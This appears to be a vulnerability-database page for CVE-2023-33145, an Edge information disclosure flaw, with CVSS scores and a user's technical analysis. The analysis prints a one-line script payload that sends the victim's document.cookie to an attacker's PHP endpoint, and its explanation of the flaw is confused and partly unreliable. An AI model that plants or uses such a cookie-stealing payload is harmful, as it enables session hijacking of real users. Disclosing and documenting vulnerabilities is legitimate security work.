Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
1

CVE-2023-33145

Disclosure Date: June 14, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated

Description

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

Add Assessment

1
Ratings
Technical Analysis

CVE-2023-33145

Vendor

Description:

The type of information that could be disclosed if an attacker successfully exploited this vulnerability is data inside the targeted website like IDs, tokens, nonces, cookies, IP, User-Agent, and other sensitive information.
The user would have to click on a specially crafted URL to be compromised by the attacker.
In this example, the attacker uses STRIDE Threat Modeling to spoof the victim to click on his website and done.
This is the general spoofing vulnerability and does not cover only EDGE, all browsers can be manipulated this way
on every OS. This will be hard to detect.

ADD: 07.07.23
This is a general spoofing problem, and it is not connected only with Edge.
From Microsoft writing bullshits again. This can happen on every OS.

BR

Conclusion:

Please be careful, for suspicious sites or be careful who sending you an link to open!

Staus: HIGH Vulnerability

[+]Exploit:

  • Exploit Server:
## This is a Get request from the server when the victims click! And it is enough to understand this vulnerability! =)

<script> var i = new Image(); i.src="PoCsess.php?cookie="+escape(document.cookie)</script>

## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty

Reproduce:

href

Proof and Exploit

href

Time spend:

01:30:00

CVSS V3 Severity and Metrics
Base Score:
6.5 Medium
Impact Score:
3.6
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • microsoft

Products

  • edge chromium

Additional Info

Technical Analysis